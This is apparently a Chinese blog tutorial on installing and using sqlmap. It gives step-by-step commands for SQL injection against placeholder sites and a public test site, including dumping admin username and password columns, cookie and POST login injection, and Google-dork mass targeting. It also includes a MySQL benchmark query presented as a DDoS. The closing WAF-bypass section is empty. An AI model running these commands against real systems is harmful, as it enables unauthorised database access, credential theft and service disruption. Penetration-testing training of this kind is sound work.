首页 渗透工具 正文
  • 本文约3525字,阅读需18分钟
  • 6363
  • 0

对不起我要上啊D7.0了!不,是sqlmap!

image.png


0x00 sqlmap简介


官网:http://sqlmap.org

sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,sqlmap是基于python开发的,因此具有跨平台的特性, 需要注意的是,python的版本需要在 2.6 ≤ 所需版本 < 3.0,否则将出现如下提示:

image.png


0x01 sqlmap的安装


先说下Linux上sqlmap的安装:

wget https://codeload.github.com/sqlmapproject/sqlmap/legacy.tar.gz/master //下载sqlmap
tar zxvf master  //解压压缩包
cd sqlmapproject-sqlmap-310d79b/   //进入解压目录
python sqlmap.py -h  //开始使用

下面具体介绍windows上的sqlmap的安装过程:

1、安装python,过程不再赘述

2、将sqlmap安装到python的安装目录下:

image.png

3、创建cmd的快捷方式,并命名为SQLMap

image.png

image.png

image.png

4、右键快捷方式->属性,并将起始位置进行修改,应用、确定

image.png

5、双击创建的快捷方式,如下:

image.png

6、执行sqlmap.py -h,如若出现以下界面,表示安装成功:

image.png

7、例子示范:

image.png


0x02 sqlmap的使用


sqlmap的使用可以参考官方文档或者"sqlmap -h",最好能熟悉下主流数据库,比如:Mysql,Sql Server,Oracle等,这样对于使用更加得心应手。下面说下最常用的用法:

一、SQLMAP用于Access数据库注入

(1) 猜解是否能注入

Win:python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"
Linux:sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"

(2) 猜解表

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables
Linux: sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables

(3) 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin
Linux: sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin

(4) 根据字段猜解内容(假如通过3得到字段为username和password)

win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C "username,password"
Linux: sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C
"username,[url=]B[/url]password"

二、SQLMAP用于Cookie注入

(1) cookie注入,猜解表

win : python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --table --level 2

(2) 猜解字段,(通过1的表猜解字段,假如表为admin)

win :python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --columns -T
admin --level 2

(3) 猜解内容

win :python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --dump -T
admin -C "username,password" --level 2

三、SQLMAP用于mysql中DDOS攻击

(1) 获取一个Shell

win:
python sqlmap.py -u [url]http://192.168.159.1/news.php?id=1[/url] --sql-shell
Linux:
sqlmap -u [url]http://192.168.159.1/news.php?id=1[/url] --sql-shell

(2) 输入执行语句完成DDOS攻击

select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

四、SQLMAP用于mysql注入

(1) 查找数据库

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" --dbs

(2) 通过第一步的数据库查找表(假如数据库名为dataname)

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname --tables

(3) 通过2中的表得出列名(假如表为table_name)

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name --columns

(4) 获取字段的值(假如扫描出id,user,password字段)

python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name -C
"id,user,password" --dump

五、SQLMAP中post登陆框注入

(1) 其中的search-test.txt是通过抓包工具burp suite抓到的包并把数据保存为这个txt文件

我们在使用Sqlmap进行post型注入时,经常会出现请求遗漏导致注入失败的情况。这里分享一个小技巧,即结合burpsuite来使用sqlmap,用这种方法进行post注入测试会更准确,操作起来也非常容易。

  1. 浏览器打开目标地址http:// www.xxx.com /Login.asp

  2. 配置burp代理(127.0.0.1:8080)以拦截请求

  3. 点击login表单的submit按钮

  4. 这时候Burp会拦截到了我们的登录POST请求

  5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下

  6. 运行sqlmap并使用如下命令:

./sqlmap.py -r search-test.txt -p tfUPass

这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt,而-p 大家应该比较熟悉,指定注入用的参数。

注入点:http://testasp.vulnweb.com/Login.asp

几种注入方式:

./sqlmap.py -r search-test.txt -p tfUPass

(2) 自动的搜索

sqlmap -u [url]http://testasp.vulnweb.com/Login.asp[/url] --forms

(3) 指定参数搜索

sqlmap -u [url]http://testasp.vulnweb.com/Login.asp[/url] --data "tfUName=321&tfUPass=321"

六、SQLMAP中Google搜索注入

inurl后面的语言是由自己定的,注入过程中如果选y是注入,如果不是选n

sqlmap -g inurl:php?id=

七、SQLMAP中的请求延迟

参数 --delay --safe-freq

python sqlmap.py --dbs -u "http://xxx.cn/index.php/Index/view/id/40.html" --delay 1
python sqlmap.py --dbs -u "http://xxx.cn/index.php/Index/view/id/40.html" --safe-freq 3

八、SQLMAP绕过WAF防火墙

注入点:http://192.168.159.1/news.php?id=1


                                        
温馨提示:本文最后更新于2018年10月6日 12:52,若内容或图片失效,请在下方留言或联系博主。
评论
博主关闭了评论